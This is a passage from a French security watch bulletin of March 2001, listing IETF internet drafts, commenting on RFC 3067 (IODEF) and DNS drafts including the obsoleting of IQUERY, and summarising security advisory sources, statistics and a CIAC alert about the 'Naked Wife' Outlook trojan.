draft-vida-mld-v2-00
draft-polk-mlpp-over-ip-00
draft-chaskar-mobileip-qos-01
draft-choi-mobileip-ldpext-01
draft-gwon-mobileip-l3mp-mipv4-00
draft-ietf-mobileip-hmipv6-02
draft-ietf-mobileip-lowlatency-handoffs-v4-00
draft-ietf-mobileip-reg-tunnel-04
draft-ietf-mobileip-rfc2002-bis-04
draft-koodli-mobileip-fastv6-02
draft-krishnamurthi-mobileip-buffer6-01
draft-malinen-mobileip-reg6fwd-00
draft-malinen-mobileip-regreg6-01
draft-manner-seamoby-terms-01
draft-nikander-mobileip-homelessv6-01
draft-subbarao-mobileip-multipleip-00
draft-subbarao-mobileip-resource-00
draft-tsao-mobileip-dualstack-model-02
draft-dubuc-mpls-bundle-mib-00
draft-harrison-mpls-oam-00
draft-ietf-isis-gmpls-extensions-02
draft-ietf-mpls-cr-ldp-05
draft-ietf-mpls-crldp-unnum-01
draft-ietf-mpls-crlsp-modify-03
draft-ietf-mpls-generalized-cr-ldp-01
draft-ietf-mpls-generalized-rsvp-te-01
draft-ietf-mpls-generalized-signaling-02
draft-ietf-mpls-lmp-02
draft-ietf-mpls-lsp-hierarchy-02
draft-ietf-mpls-recovery-frmwrk-02
draft-ietf-mpls-rsvp-unnum-01
draft-ietf-mpls-te-mib-06
draft-kompella-mpls-bundle-05
draft-kompella-mpls-multiarea-te-01
draft-kompella-mpls-rsvp-constraints-00
draft-kompella-ospf-gmpls-extensions-01
draft-lang-ccamp-recovery-00
draft-lee-mpls-te-exchange-01
27/02
07/03
02/03
07/03
01/03
02/03
28/02
06/03
07/03
02/03
01/03
27/02
27/02
02/03
01/03
26/02
26/02
01/03
26/02
01/03
26/02
27/02
06/03
08/03
05/03
28/02
28/02
26/02
27/02
05/03
05/03
05/03
05/03
27/02
28/02
26/02
06/03
28/02
05/03
26/02
28/02
07/03
28/02
27/02
05/03
26/02
07/03
05/03
08/03
08/03
08/03
08/03
05/03
06/03
26/02
26/02
02/03
28/02
26/02
02/03
02/03
06/03
01/03
07/03
07/03
07/03
06/03
06/03
05/03
06/03
08/03
02/03
06/03
27/02
02/03
27/02
07/03
Common Label & Label Requ. Specific. for Auto. Swit. Trans. Net.
IPP: The INDP Notification Delivery Method and Protocol/1.0
IPP: Printer Installation Extension
IPP: The 'ippget' Delivery Method for Event Notifications
A Framework for Defining Empirical Bulk Transfer Capacity Metrics
IP Packet Delay Variation Metric for IPPM
IRML: A Rule Specification Language for Intermediary Services
Definitions of Managed Objects for SCSI over TCP
iSCSI Digests – CRC or Checksum?
ISCSI
A Standard for BootStrapping Clients using the iSCSI Protocol
ISCSI Naming and Discovery Requirements
M-ISIS: Multi Topology Routing in IS-IS
ISNS Internet Storage Name Service
Integrated Service Mappings for Differentiated Services Networks
TRIP Transit Network Selection
L2TP Multicast Extension
L2TP IP Differentiated Services Extension
Frame Relay Service Type for L2TP
LDAP V3: UTF-8 String Representation of Distinguished Names
LDAP V3
Link Management Protocol MIB Using SMIv2
Link Management Protocol (LMP) for WDM Transmission Systems
Enhanced LSP Services
IP Multicast Applications: Challenges and Solutions
A Message Bus for Local Coordiantion
An Mbus Profile for Internet Appliance Control
Switch Partitioning MIB
CONDITION MIB
Alarm MIB
ITU Alarm MIB
Definitions of Managed Objects for Scheduling Mgmt Operations
Definitions of Managed Objects for the Delegation of Mgmt Scripts
SNMP Alarms and MIB Module
Fibre Channel Management Framework Integration MIB
Alarm Reporting Control MIB
Definitions of Managed Objects for the Optical Interface Type
Requirements for the MIDCOM architecture and control language
Mapping Between MIME Types, Content-Types and URIs
Multicast Listener Discovery Version 2 (MLDv2) for IPv6
Multi-Level Precedence and Preemption over IP
A Framework for QoS Support in Mobile IPv6
Extension of LDP for Mobile IP Service through the MPLS Network
Network Layer Triggered Mobile IPv4 Predictive Handoff
Hierarchical MIPv6 mobility management
Low latency Handoffs in Mobile IPv4
Mobile IP Regional Registration
IP Mobility Support for IPv4, revised
Fast Handovers in Mobile Ipv6
Buffer Management for Smooth HandOvers in Mobile IPv6
Mobile IPv6 Regional Forwarding
Mobile IPv6 Regional Registrations
Mobility Related Terminology
Homeless Mobile IPv6
Mobile IP NAI with Multiple Static IP Address Flows
Releasing Resources in Mobile IP
Mobility Supp. for IPv4 & v6 Interc. Net. based on Dual-Stack Mod
Link Bundling Information Base Using SMIv2
OAM Functionality for MPLS Networks
IS-IS Extensions in Support of Generalized MPLS
Constraint-Based LSP Setup using LDP
Signalling Unnumbered Links in CR-LDP
LSP Modification Using CR-LDP
Generalized MPLS Signaling - CR-LDP Extensions
Generalized MPLS Signaling - RSVP-TE Extensions
Generalized MPLS - Signaling Functional Description
Link Management Protocol (LMP)
LSP Hierarchy with MPLS TE
Framework for MPLS-based Recovery
Signalling Unnumbered Links in RSVP-TE
MPLS Traffic Engineering MIB Using SMIv2
Link Bundling in MPLS Traffic Engineering
Multi-area MPLS Traffic Engineering
Carrying Constraints in RSVP
OSPF Extensions in Support of Generalized MPLS
Generalized MPLS Recovery Mechanisms
Distributed Route Exchangers
Page 20/51
Mars 2001
MSDP
MSEC
MSNIP
MTQP
NAMED
NFS
NGTRANS
NMRG
NTIP
OLCP
OLSR
OMML
OPES
OPTICAL
OSPF
PACKET
PARO
PCAP
PIM
POLICY
POP
PPP
PRIM
PROTO
REQUEST
RFC2011
RFC2012
RFC2013
RFC2096
RMON
RMT
ROHC
RSP
RSVP
RTCP
RTP
draft-nadeau-mpls-ds-te-mib-00
draft-osu-ipo-mpls-issues-01
draft-rekhter-mpls-over-gre-01
draft-satoru-mpls-1hop-lsp-00
draft-worster-mpls-in-ip-04
draft-xu-ccamp-gmpls-sig-reorg-00
draft-ietf-msdp-mib-05
draft-ietf-msdp-traceroute-05
draft-ietf-msec-gdoi-00
draft-ietf-idmr-msnip-00
draft-ietf-msgtrk-mtqp-02
draft-howard-named-object-00
draft-ietf-nfsv4-rpc-ipv6-00
draft-ietf-ngtrans-bgp-tunnel-01
26/02
07/03
28/02
26/02
02/03
26/02
02/03
02/03
26/02
27/02
07/03
28/02
28/02
05/03
draft-ietf-ngtrans-introduction-to-ipv6-transition-06
06/03
draft-irtf-nmrg-snmp-tcp-06
05/03
draft-sahay-ccamp-ntip-00
26/02
draft-chiu-strand-unique-olcp-02
02/03
draft-ietf-manet-olsr-04
06/03
draft-maciocco-opes-omml-00
27/02
draft-yang-opes-rule-processing-service-execution-00 27/02
draft-banerjee-routing-impairments-00
26/02
draft-ghani-optical-rings-01
07/03
draft-guo-optical-mesh-ring-01
07/03
draft-krishnaswamy-optical-rsvp-extn-00
27/02
draft-many-optical-restoration-00
27/02
draft-poj-optical-multicast-00
28/02
draft-giacalone-te-optical-next-02
02/03
draft-ietf-ospf-abr-alt-04
06/03
draft-ietf-ospf-dc-01
06/03
draft-ietf-ospf-floodgates-01
26/02
draft-ietf-ospf-isis-flood-opt-01
06/03
draft-ietf-ospf-oob-resync-01
06/03
draft-ietf-ospf-ppp-flood-01
01/03
draft-ietf-ospf-restart-01
06/03
draft-ietf-ospf-scalability-00
01/03
draft-ma-ospf-isis-te-00
27/02
draft-pillay-esnault-ospf-flooding-03
06/03
draft-pbh-packet-optical-escalation-00
27/02
draft-gomez-paro-manet-00
27/02
draft-bullard-pcap-01
01/03
draft-ietf-pim-bidir-02
07/03
draft-ietf-pim-sm-bsr-00
27/02
draft-ietf-pim-sm-v2-new-02
07/03
draft-ietf-policy-terminology-02
02/03
draft-gellens-pop-err-01
01/03
draft-brucet-pppext-ppp-over-aal2-class-00
27/02
draft-ietf-pppext-ppp-over-aal2-00
05/03
draft-mazzoldi-prim-impp-01
05/03
draft-eastlake-proto-doc-pov-02
01/03
draft-cain-request-routing-req-01
05/03
draft-ops-rfc2011-update-00
27/02
27/02
27/02
27/02
draft-ietf-rmonmib-apm-mib-03
07/03
draft-ietf-rmonmib-hcrmon-06
07/03
draft-ietf-rmonmib-tokenring-01
07/03
draft-ietf-rmt-author-guidelines-01
06/03
draft-ietf-rmt-bb-pgmcc-00
27/02
draft-ietf-rmt-bb-track-01
07/03
draft-ietf-rmt-bb-tree-config-02
07/03
draft-ietf-rmt-pi-norm-01
08/03
draft-ietf-rohc-over-ppp-01
05/03
draft-ietf-rohc-rtp-09
28/02
draft-ietf-rohc-tcp-epic-00
26/02
draft-price-rohc-epic-compatibility-00
26/02
draft-price-rohc-epic-sctp-00
26/02
draft-ietf-rserpool-reqts-01
01/03
draft-cai-vc-rsvp-te-00
27/02
draft-ietf-issll-rsvp-aggr-03
28/02
draft-chesterfield-avt-rtcpssm-00
27/02
draft-wenger-avt-rtcp-feedback-02
08/03
draft-curet-avt-rtp-mpeg4-flexmux-00
26/02
draft-ietf-avt-dv-audio-03
08/03
draft-ietf-avt-profile-interop-05
06/03
draft-ietf-avt-profile-new-10
08/03
Diff-Serv-aware MPLS Traffic Engine. Network MIB Using SMIv2
IP over Optical Networks: A Summary of Issues
MPLS Label Stack Encapsulation in GRE
TTL Processing expansion for 1-hop LSP
MPLS Label Stack Encapsulation in IP
Mods and Reorg. to GMPLS Signaling Functional Specification
Multicast Source Discovery protocol MIB
MSDP Traceroute
The Group Domain of Interpretation
Multicast Source Notification of Interest Protocol (MSNIP)
Message Tracking Query Protocol
A Structural Object Class for Arbitrary Auxiliary Object Classes
IPv6 extension to RPC
Connecting IPv6 Domains across IPv4 Clouds with BGP
On overviewof the Introduction of IPv6 in the Internet
SNMP over TCP Transport Mapping
NTIP for Photonic Cross Connects (PXC)
Unique Features and Requir. for The Optical Layer Control Plane
Optimized Link State Routing Protocol
OMML: OPES Meta-data Markup Language
OPES Architecture for Rule Processing and Service Execution
Impairment Constraints for Routing in All-Optical Networks
Architect. Framw. for Automatic Protect. Provision. In Dyna. Opt…
Hybrid Mesh-Ring Optical Networks and Their Routing Information
Lightpath Route Extensions to RSVP-TE for optical channel conn.
Restoration Mechanisms and Signaling in Optical Networks
Optical Multicast – A Framework
Network Engineering Extensions (NEXT) for OSPFv3
Alternative OSPF ABR Implementations
Detecting Inactive Neighbors over OSPF Demand Circuits
OSPF Floodgates
Flooding optimizations in link-state routing protocols
OSPF Out-of-band LSDB resynchronization
Flooding over parallel point-to-point links
OSPF Restart Signaling
Explicit Marking and Prioritized Treatment of Specific IGP Pack …
Using 2 Octets for Bandwidth Values in OSPF and ISIS extensions
OSPF Refresh and flooding reduction in stable topologies
Packet-Optical Escalation Strategies
PARO: A Power-Aware Routing Optimization Scheme for Mobile ..
Remote Packet Capture
Bi-directional Protocol Independent Multicast
Bootstrap Router (BSR) Mechanism for PIM Sparse Mode
PIM - Sparse Mode PIM-SM): Protocol Specification (Revised)
Terminology
The SYS and AUTH POP Response Codes
Class Extensions for PPP over AAL2
PPP over AAL2
Presence and Instant Messaging Protocol (PRIM)
Protocol versus Document Points of View
Request Routing Requirements for Content Internetworking
MIB for the Internet Protocol (IP)
MIB for the Transmission Control Protocol (TCP)
MIB for the User Datagram Protocol (UDP)
IP Forwarding Table MIB
Application Performance Measurement MIB
Remote Network Monitoring MIB for High Capacity Networks
Token Ring Extensions to the Remote Network Monitoring MIB
Author Guidelines for RMT Building Blocks & Protocol Instantiat..
PGMCC single rate multicast conge. control: Protocol Specification
RMT Building Block for TRACK
RMT Building Block: Tree Auto-Configuration
NACK-Oriented Reliable Multicast Protocol (NORM)
ROHC over PPP
Robust Header Compression (ROHC)
Robust TCP/IP Compression Using EPIC
Generating a ROHC 08 Compatible Profile Using EPIC
Robust SCTP/IP Compression Using EPIC
Requirements for Reliable Server Pooling
Signaling Virtual Circuit Label Using RSVP-TE
RSVP Reservations Aggregation
RTCP Extension for Source Specific Multicast Sessions
RTCP-based Feedback: Concepts and Message Timing Rules
RTP Payload Format for MPEG-4 FlexMultiplexed Streams
RTP Payload Format for 12bit DAT, 20 & 24bit Linear Sampl. Audio
RTP Audio/Video Profile Interoperability Statement
RTP Profile for Audio and Video Conferences with Minimal Control
Page 21/51
Mars 2001
SCCP
SCTP
SDP
SIGTRAN
SIP
SMIME
SMING
SMTP
SNMP
SONET
SRLG
SSPM
TBRPF
TCP
TDM
TE
TRADE
TRIP
TSVWG
UDPLITE
ULP
URN
UTF8
VOIP
VPIM
VPN
WCIP
WEDAV
draft-ietf-avt-rtcp-bw-03
draft-ietf-avt-rtp-amr-05
draft-ietf-avt-rtp-interop-07
draft-ietf-avt-rtp-mime-04
draft-ietf-avt-rtp-new-09
draft-ietf-avt-rtp-selret-01
draft-ietf-avt-uxp-00
draft-moffitt-vorbis-rtp-00
draft-ietf-mmusic-sccp-01
draft-leung-sigtran-stream-sctp-00
draft-stewart-sctpsocket-sigtran-02
draft-andreasen-mmusic-sdp-simcap-01
draft-ietf-mmusic-sdp-new-01
draft-ietf-sigtran-m2pa-02
draft-ietf-sigtran-m3ua-06
draft-ietf-sigtran-sctp-mib-03
draft-campbell-sip-cc-framework-02
draft-dcsgroup-sip-arch-04
draft-dcsgroup-sip-proxy-proxy-04
draft-ietf-sip-100rel-03
draft-ietf-sip-call-auth-01
draft-ietf-sip-call-flows-03
draft-ietf-sip-cc-transfer-04
draft-ietf-sip-guidelines-02
draft-ietf-sip-isup-mime-08
draft-ietf-sip-manyfolks-resource-01
draft-ietf-sip-mib-02
draft-ietf-sip-serverfeatures-04
draft-ietf-sip-service-examples-01
draft-ietf-sip-state-01
draft-jfp-sip-isup-header-00
draft-jfp-sip-servicecodes-00
draft-levin-sip-for-video-00
draft-mule-sip-t38callflows-01
draft-polk-sip-mlpp-mapping-01
draft-rosenberg-sip-3pcc-02
draft-rosenberg-sip-app-components-01
draft-vemuri-sip-t-context-02
draft-ietf-smime-ecc-03
draft-ietf-sming-01
draft-ietf-sming-inet-modules-01
draft-ietf-sming-modules-01
draft-ietf-sming-reqs-00
draft-ietf-sming-snmp-01
draft-melnikov-smtp-lang-03
draft-ietf-ops-rowpointer-tc-01
draft-ietf-snmpconf-bcp-04
draft-ietf-snmpv3-arch-v2-00
draft-ietf-snmpv3-mpd-v2-00
draft-ietf-atommib-sonetaps-mib-03
draft-malis-sonet-ces-mpls-03
draft-many-inference-srlg-00
draft-cole-sspm-02
draft-ietf-manet-tbrpf-01
draft-allman-tcp-abc-01
draft-ietf-pilc-asym-03
draft-anavi-tdmoip-01
draft-ash-ccamp-multi-area-te-reqmts-00
draft-many-tewg-te-applicability-00
draft-wlai-tewg-measure-00
draft-ietf-trade-iotp2-req-00
draft-zinman-trip-mib-01
draft-ietf-tsvwg-ecn-02
draft-ietf-tsvwg-ecn-ip-00
draft-ietf-tsvwg-tcp-eifel-alg-00
draft-ietf-tsvwg-tfrc-01
draft-larzon-udplite-04
draft-williams-tcpulpframe-00
draft-ietf-urn-rfc2611bis-02
draft-skwan-utf8-dns-05
draft-dobrowolski-voip-cm-01
draft-ietf-vpim-cc-03
draft-ietf-vpim-ivm-goals-01
draft-kb-ppvpn-l2vpn-motiv-00
draft-scandariato-ppvpn-info-model-00
draft-danli-wrec-wcip-01
draft-ietf-deltav-versioning-14
08/03
01/03
06/03
08/03
08/03
05/03
27/02
26/02
05/03
05/03
05/03
05/03
07/03
02/03
05/03
01/03
06/03
02/03
01/03
07/03
01/03
02/03
28/02
07/03
01/03
01/03
02/03
28/02
02/03
01/03
27/02
28/02
26/02
02/03
08/03
07/03
09/03
02/03
06/03
07/03
07/03
07/03
27/02
07/03
08/03
06/03
08/03
27/02
27/02
02/03
01/03
26/02
28/02
06/03
02/03
05/03
02/03
27/02
27/02
27/02
27/02
05/03
02/03
27/02
26/02
07/03
28/02
27/02
02/03
02/03
02/03
05/03
01/03
28/02
26/02
02/03
26/02
SDP Bandwidth Modifiers for RTCP Bandwidth
RTP payload format for AMR
RTP Interoperability Statement
MIME Type Registration of RTP Payload Formats
RTP: A Transport Protocol for Real-Time Applications
RTP Retransmission Payload Format
An RTP Payload Format for Erasure-Resilient Trans. of Prog. Mult.
RTP Payload Format for Vorbis Encoded Audio
Simple Conference Control Protocol
SCTP Stream Function Extensions
SCTP Sockets Mapping
SDP Simple Capability Negotiation
SDP: Session Description Protocol
SS7 MTP2-User Peer-to-Peer Adaptation Layer
SS7 MTP3-User Adaptation Layer (M3UA)
Stream Control Transmission Protocol MIB using SMIv2
Framework for SIP Call Control Extensions
Architectural Considerations for Providing Carrier Class Telephony
SIP proxy-to-proxy ext. for supporting Distributed Call State
Reliability of Provisional Responses in SIP
SIP Extensions for Media Authorization
SIP Telephony Call Flow Examples
SIP Call Control
Guidelines for Authors of SIP Extensions
MIME media types for ISUP and QSIG Objects
Integration of Resource Management and SIP
Management Information Base for Session Initiation Protocol
The SIP Supported Header
SIP Service Examples
SIP Extensions for supporting Distributed Call State
Mapping of ISUP parameters to SIP headers in SIP-T
A Model for Service Invocation in SIP using ServiceCodes
SIP Requirements for support of Multimedia and Video
SIP T.38 Call Flow Examples And Best Current Practice
SIP Precedence mapping to MLPP Interworking
Third Party Call Control in SIP
An Application Server Component Architecture for SIP
SIP for Telephones (SIP-T): Context and Architectures
Use of ECC Algorithms in CMS
SMIng - Next Generation Structure of Management Information
SMIng Internet Protocol Core Modules
SMIng Core Modules
SMIng Requirements
SMIng Mappings to SNMP
SMTP Language Extension
SNMP Textual Convention for Reusable Conceptual Rows
Configuring Networks and Devices with SNMP
An Architecture for Describing SNMP Management Frameworks
Message Processing and Dispatching for SNMP
Definitions of Managed Objects for SONET Linear APS Architect.
SONET/SDH Circuit Emulation Service Over MPLS (CEM) Encaps.
Inference of Shared Risk Link Groups
A Framework for Synthetic Sources for Performance Monitoring
Topology Broadcast based on Reverse-Path Forwarding (TBRPF)
TCP Congestion Control with Appropriate Byte Counting
TCP Performance Implications of Network Asymmetry
TDM over IP
Requirements for Multi-Area TE
Applicability Statement for Traffic Engineering with MPLS
A Framework for Internet Traffic Measurement
Internet Open Trading Protocol Version 2 Requirements
Management Information Base for Telephony Routing over IP
The Addition of Explicit Congestion Notification (ECN) to IP
An Open ECN Service in the IP layer
The Eifel Algorithm for TCP
TCP Friendly Rate Control (TFRC):Protocol Specification
The UDP Lite Protocol
ULP Framing for TCP
URN Namespace Definition Mechanisms
Using the UTF-8 Character Set in the Domain Name System
Internet-based Service Creation and the Need for a VoIP Call Mod.
Critical Content of Internet Mail
Goals for Internet Voice Mail
Whither Layer 2 VPNs?
An Information Model for Provider Provisioned VPN
WCIP: Web Cache Invalidation Protocol
Versioning Extensions to WebDAV
Page 22/51
Mars 2001
XCAST
draft-ooms-xcast-basic-spec-01
YEUNG
draft-katz-yeung-ospf-traffic-04
ZEROCON draft-ietf-zeroconf-ipv4-linklocal-02
draft-ietf-zeroconf-reqts-07
05/03
01/03
05/03
07/03
Explicit Multicast (Xcast) Basic Specification
Traffic Engineering Extensions to OSPF
Dynamic Configuration of IPv4 link-local addresses
ZeroConf Requirements
Page 23/51
Mars 2001
NOS COMMENTAIRES
LES RFC
RFC 3067
TERENA'S Incident Object Description and Exchange Format Requirements
Le RFC 3067 résulte de la contribution de l'association TERENA - Trans-European Research Education Networking
Association - aux travaux de standardisation menés dans le domaine de la détection d'intrusion et des mécanismes
d'alerte. Cette association fédère, et dans certains cas finance, divers projets de recherche intéressant les réseaux
européens de la recherche et de l'éducation. Elle anime certaines activités visant à normaliser les moyens et les
infrastructures communes. Ces activités sont menées au sein de comités spécialisés (TaskForce ou TF).
Le comité TF-CSIRT est ainsi chargé de promouvoir la collaboration entre les CSIRT (Computer Security Incident
Response Teams) Européens en animant un forum de discussion, en définissant les services pilotes pour les CSIRT
Européens et en assurant la promotion des standards et procédures de gestion des incidents.
Le groupe travail ITDWG (Incident Taxonomy and Description
Working Group) a été constitué dans l'optique d'établir un modèle
générique de description d'un incident exploitable par l'ensemble
des CSIRT.
Ce modèle, dénommé IODEF (Incident Object Description &
Exchange Format), a été formalisé puis décrit au moyen d'un DTD
XML en tenant compte des travaux menés par le groupe IDWG
(Intrusion Detection) de l'IETF.
Ainsi, une compatibilité ascendante a été recherchée permettant
d'inclure un objet conforme au modèle IDMEF (Intrusion
Detection Message Exchange Format) - cf rapports N°9 Avril 1999
et N°16 Novembre 1999 - dans une description IODEF.
Le RFC 3067 décrit en détail les exigences liées au modèle
IODEF dont notamment la signification sémantique des termes
employés.
Notons que la sémantique retenue privilégie volontairement la
lisibilité 'humaine' au détriment de la facilité d'analyse
automatique:
"IODEF is a human oriented format for Incident description, and
IODEF description should be capable of being read by humans.
The use of automatic parsing tools is foreseen but should not be
critically necessary."
Les définitions proposées - Attack, Attacker, Damage, Event,
Evidence, Incident, Impact, Target, Victim et Vulnerability - sont
claires et précises.
Nous ne pouvons que regretter l'absence d'une proposition de
traduction de cette terminologie dans les autres langues de la
communauté Européen dont, en particulier, le Français.
ftp://ftp.isi.edu/in-notes/rfc3067.txt
LES DRAFTS
DRAFT-COFFEYSTRAIN-DNSEXT-PRIVATEDNSTLD-00
DNS TLD For Private Networks
Intitulé 'DNS Top Level Domain for Private Networks', cette proposition de standard répond à une préoccupation
de plus en plus souvent rencontrée dans les entreprises: la cohabitation de deux systèmes de noms, l'un destiné à
être publié sur l'Internet, l'autre réservé à une visibilité interne.
Trois méthodes peuvent être utilisées qui sont brièvement récapitulées par les auteurs du Draft:
1. L'utilisation d'un même nom de domaine conduisant à devoir mettre en place un mécanisme physique ou logique
d'isolation, mécanisme toujours complexe et susceptible de défaillances.
2. L'utilisation de deux noms différents, le nom interne devant être habilement sélectionné afin de ne pas entrer en
conflit avec un nom par ailleurs réservé et donc enregistré sur l'Internet. Cependant, et quelque soit le nom
choisi, il est probable que celui-ci entre tôt ou tard en conflit avec un nom enregistré. Notons à ce propos, qu'il
n'est pas possible de réserver un nom de domaine sans que celui-ci soit inscrit dans les DNS Internet.
3. L'utilisation d'une racine (TLD) non utilisée dans l'infrastructure DNS Internet. Idéalement, ce TLD devrait être
Page 24/51
Mars 2001
tel que l'on puisse avoir la garantie qu'il ne soit jamais enregistré et utilisé par un tiers.
Cette dernière méthode est de loin la plus efficace bien qu'imposant une légère contrainte aux utilisateurs devant
utiliser un TLD spécifique en interne. En conséquence, les auteurs du document propose la réservation du TLD '.pri'.
Un serveur DNS interne de l'entreprise pourra alors être configuré pour être autoritaire sur la racine '.pri' et les
domaines sous-jacents, les autres domaines étant alors résolus par le biais des serveurs DNS de l'Internet.
ftp://ftp.nordu.net/internet-drafts/draft-coffeystrain-dnsext-privatednstld-00.txt
DRAFT-ESIBOV-DNSOP-SUPPRESS-QUERIES-00
Suppressing DNS queries
Complémentaire du draft 'DNS TLD For Private Networks' commenté précédemment, ce document vise à mettre
en place, voir imposer, un mécanisme de filtrage des requêtes portant sur les TLD réservés par le RFC 2606 (.test,
.example, .invalid, .localhost) ou proposés à la réservation (.pri). A cette fin, les serveurs DNS de l'Internet
devront être systématiquement configurés comme serveurs primaires sur ces zones.
ftp://ftp.nordu.net/internet-drafts/draft-esibov-dnsop-suppress-queries-00.txt
DRAFT-IETF-DNSEXT-OBSOLETE-IQUERY-00
Obsoleting IQUERY
Le RFC 1035 ' Domain Names - Implementation and Specification' définit une requête - IQUERY (OpCode =
1) - permettant d'obtenir le nom d'un système à partir de son adresse IP, opération habituellement dénommée
'requête inverse' ou 'Reverse Mapping'.
Le traitement de cette requête conduit à devoir
IQUERY
effectuer une recherche exhaustive dans les bases du
? 194.2.187.187.
DNS à partir de la racine, la seule clef exploitable à ce
niveau étant le nom du domaine.
1,n
1,n
Actuellement, toutes les implémentations documentées
utilisent un mécanisme basé sur l'inversion du DNS
.com
1,n
défini dans le même RFC 1035. Une requête DNS
1,n
'classique' mais contenant une adresse IP en lieu et
.fr
place du nom de domaine est effectuée vers le domaine
1,n
dédié 'in-addr.arpa'. L'adresse devient ici une clef
permettant d'accélérer notablement la recherche.
.apogee
L'abandon définitif et officiel du mécanisme IQUERY
.nnn xxx.yyy.zzz.ttt
.veille 194.2.187.187
dans DNSEXT est donc à considérer d'autant que celuici est potentiellement exploitable pour ,non seulement
1,n
générer un déni de service, mais aussi obtenir le
contenu d'une zone.
Le RFC 1035 reste un document de référence ayant
? 187.187.2.194
fait l'objet de très nombreux additifs (RFC 1101, 1183,
.in-addr.arpa
1348, 1876, 1982, 1995, 1996, 2065, 2136, 2137,
.in-addr.arpa
2181, 2308, 2535 et 2845 !) mais n'ayant jamais été
remplacé.
L'IETF propose donc de modifier celui-ci en ajoutant le
paragraphe
.194
"Inverse queries using the IQUERY opcode were
.194.2
originally described as the ability to look up the
names that are associated with a particular RR. Their
.194.2.187
implementation was optional and never achieved
194.2.187.187 veille
widespread use. Therefore IQUERY is now obsolete,
and name servers SHOULD return a "Not
Illustrations destinées à présenter les grands principes et non représentatives des échanges et de l’infrastructure réelle
© Apogée Communications
Implemented" error when an IQUERY request is
received."
Notons que "l'inutilité" de cette fonctionnalité 'optionnelle' peut expliquer que de nombreuses erreurs de codages
aient pu être mises à profit (cf CERT CA-98.05) sur les différentes implémentations du DNS !
ftp://ftp.nordu.net/internet-drafts/draft-ietf-dnsext-obsolete-iquery-00.txt
Page 25/51
Mars 2001
ALLEER
RT
TE
ES
SE
ET
T AT
TT
TA
AQ
QU
UE
ES
S
ALERTES
GUIDE DE LECTURE
La lecture des avis publiés par les différents organismes de surveillance ou par les constructeurs n’est pas
toujours aisée. En effet, les informations publiées peuvent être non seulement redondantes mais aussi
transmises avec un retard conséquent par certains organismes. Dès lors, deux alternatives de mise en
forme de ces informations peuvent être envisagées :
Publier une synthèse des avis transmis durant la période de veille, en classant ceux-ci en fonction de
l’origine de l’avis,
Publier une synthèse des avis transmis en classant ceux-ci en fonction des cibles.
La seconde alternative, pour séduisante quelle soit, ne peut être raisonnablement mise en œuvre étant
donné l’actuelle diversité des systèmes impactés. En conséquence, nous nous proposons de maintenir une
synthèse des avis classée par organisme émetteur de l’avis.
Afin de faciliter la lecture de ceux-ci, nous proposons un guide de lecture sous la forme d'un synoptique
résumant les caractéristiques de chacun des sources d’information ainsi que les relations existant entre ces
sources. Seules les organismes, constructeurs ou éditeurs, disposant d’un service de notification officiel et
publiquement accessible sont représentés.
Avis Spécifiques
Constructeurs
Réseaux
3Com
Cisco
Systèmes
Avis Généraux
Editeurs
Systèmes
Compaq
Indépendants
Editeurs
Linux
Hackers
Microsoft
HP
FreeBSD
IBM
NetBSD
SGI
OpenBSD
SUN
SCO
l0pht
Netscape
rootshell
Editeurs
Organismes
Autres
US
Autres
Aus-CERT
AXENT
BugTraq
CERT
ISS
@Stake
CIAC
Typologies des informations publiées
Publication de techniques et de programmes d’attaques
Détails des alertes, techniques et programmes
Synthèses générales, pointeurs sur les sites spécifiques
Notifications détaillées et correctifs techniques
L’analyse des avis peut être ainsi menée selon les trois stratégies suivantes :
Recherche d’informations générales et de tendances :
Lecture des avis du CERT et du CIAC
Maintenance des systèmes :
Lecture des avis constructeurs associés
Compréhension et anticipation des menaces :
Lecture des avis des groupes indépendants
Aus-CERT
CERT
3Com
Compaq
Microsoft
BugTraq
rootshell
AXENT
NetBSD
Cisco
HP
Netscape
@Stake
l0pht
ISS
OpenBSD
IBM
Xfree86
SGI
Linux
SUN
FreeBSD
CIAC
Page 26/51
Mars 2001
FORMAT DE LA PRÉSENTATION
Les alertes et informations sont présentées classées par sources puis par niveau de gravité sous la forme
de tableaux récapitulatifs constitués comme suit:
Présentation des Alertes
EDITEUR
TITRE
Description sommaire
Gravité
Date Informations concernant la plate-forme impactée
Produit visé par la vulnérabilité Description rapide de la source du problème
Correction
URL pointant sur la source la plus pertinente
Référence
Présentation des Informations
SOURCE
TITRE
Description sommaire
URL pointant sur la source d'information
SYNTHESE MENSUELLE
Le tableau suivant propose un récapitulatif du nombre d’avis publiés pour la période courante, l’année en
cours et l’année précédente. Ces informations sont mises à jour à la fin de chaque période de veille.
L’attention du lecteur est attirée sur le fait que certains avis sont repris et rediffusés par les différents
organismes. Ces chiffres ne sont donc représentatifs qu’en terme de tendance et d’évolution.
Période du 23/02/2001 au 23/03/2001
Période
Organisme
16
CERT-CA
1
CERT-IN
1
CIAC
14
Constructeurs
12
Cisco
4
HP
6
IBM
2
SGI
0
Sun
0
Editeurs
6
Allaire
0
Microsoft
5
Netscape
1
Sco
0
Unix libres
39
Linux RedHat
7
Linux Debian
16
Linux Mandr.
11
FreeBSD
5
Autres
5
@Stake
3
Safer
0
X-Force
2
Cumul
2001 2000
41
118
4
22
2
10
35
86
26
77
5
13
14
28
5
17
0
12
2
7
21
155
2
32
17
100
1
7
1
16
115
226
17
137
36
66
34
-28
23
16
38
8
10
4
1
4
27
Cumul 2001 - Constructeurs
SGI Sun
0% 8%
IBM
19%
Sun
9%
IBM
22%
Cumul 2001 - Editeurs
Microsoft
80%
SGI
16%
Cisco
19%
HP
54%
Netscape
5%
Cumul 2000 - Constructeurs
Sco Allaire
5% 10%
Cisco
17%
HP
36%
Cumul 2000 - Editeurs
Netscape
5%
Sco
10%
Allaire
21%
Microsoft
64%
Page 27/51
Mars 2001
ALERTES DÉTAILLÉES
AVIS OFFICIELS
Les tables suivantes présentent une synthèse des principales alertes de sécurité émises par un organisme
fiable, par l’éditeur du produit ou par le constructeur de l’équipement. Ces informations peuvent être
considérées comme fiables et authentifiées. En conséquence, les correctifs proposés, s'il y en a, doivent
immédiatement être appliqués.
CIAC
Alerte virus 'The+Naked+Wife' (W32.Naked@mm)
Un nouveau Cheval de Troie sévit actuellement sur l'Internet en se propageant via 'Outlook'.
Forte
06/03 Windows 95, 98, NT, ME et 2000 avec Outlook.
Propagation du virus lors de l'exécution
Correctif existant Virus 'The+Naked+Wife'
http://www.nipc.gov/warnings/advisories/2001/01-002.htm
NIPC [01-002]
http://www.ciac.org/ciac/bulletins/l-056.shtml
CIAC [L-056]
http://service1.symantec.com/sarc/sarc.nsf/html/[email protected]
Symantec
